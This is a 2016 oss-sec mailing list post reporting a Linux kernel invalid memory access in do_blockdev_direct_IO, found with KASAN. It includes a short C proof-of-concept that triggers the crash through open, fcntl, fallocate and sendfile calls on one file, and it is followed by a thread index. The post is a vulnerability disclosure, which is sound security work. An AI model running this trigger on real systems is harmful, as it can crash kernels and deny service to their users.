oss-sec mailing list archives
linux kernel do_blockdev_direct_IO invalid memory access
From: Marco Grassi <marco.gra () gmail com>
Date: Tue, 11 Oct 2016 22:22:48 +0800
Hello, I posted this to ask feedback on security at kernel dot org, but I think my mail got bounced back. Not sure if from the mailing list or from some single recipient. Anyway reposting here, the following program will cause a invalid memory access BUG: KASAN: wild-memory-access on address 0005080000000000 See this link for the full sanitizer report, stacktrace and trigger poc https://gist.github.com/marcograss/40850adb3c599ac38e0beac31617d56b tested on current master, with KASAN. Marco --- #include <sys/syscall.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #define _GNU_SOURCE #include <fcntl.h> #include <sys/sendfile.h> int main() { int ret = 0; int fd = open("./hurrdurr", O_APPEND|O_RDWR|0x40); ret = fcntl(fd, 4, 0x44000, 0, 0, 0); ret = fallocate(fd, 0, 0x21, 0xafa6); off_t offset = 0; ret = sendfile(fd, fd, &offset, 0x800); return 0; }
Current thread:
- linux kernel do_blockdev_direct_IO invalid memory access Marco Grassi (Oct 11)
- Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)
- Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)
- Re: linux kernel do_blockdev_direct_IO invalid memory access cve-assign (Oct 11)
- Re: Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)
- Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)